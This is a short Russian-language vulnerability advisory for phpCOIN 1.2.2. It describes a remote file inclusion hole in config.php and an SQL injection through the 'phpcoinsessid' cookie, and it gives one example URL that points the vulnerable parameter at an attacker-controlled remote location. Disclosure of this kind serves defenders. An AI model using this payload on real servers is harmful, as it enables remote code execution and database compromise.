• Партнер

  • Программа: phpCOIN 1.2.2

    Обнаруженные уязвимости позволяют удаленному пользователю выполнить произвольные
    команды на системе и произвести SQL-инъекцию.

    1. Уязвимость существует из-за недостаточной обработки входных данных в
    параметре "_CCFG[_PKG_PATH_DBSE]" сценария "config.php". Удаленный пользователь
    может с помощью специально сформированного URL выполнить произвольный PHP
    сценарий на целевой системе с привилегиями Web сервера. Для успешной
    эксплуатации уязвимости опция "register_globals" должна быть включена.

    Пример:

    http://[target]/[path]/config.php?_CCFG [_PKG_PATH_DBSE]=http://[location]

    2. Уязвимость существует из-за недостаточной обработки входных данных в
    параметре "phpcoinsessid" файла куки. Удаленный пользователь может с помощью
    специально сформированного файла куки выполнить произвольные SQL команды в базе
    данных приложения. Для успешной эксплуатации уязвимости опция "magic_quotes_gpc"
    должна быть выключенной.
     

    Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии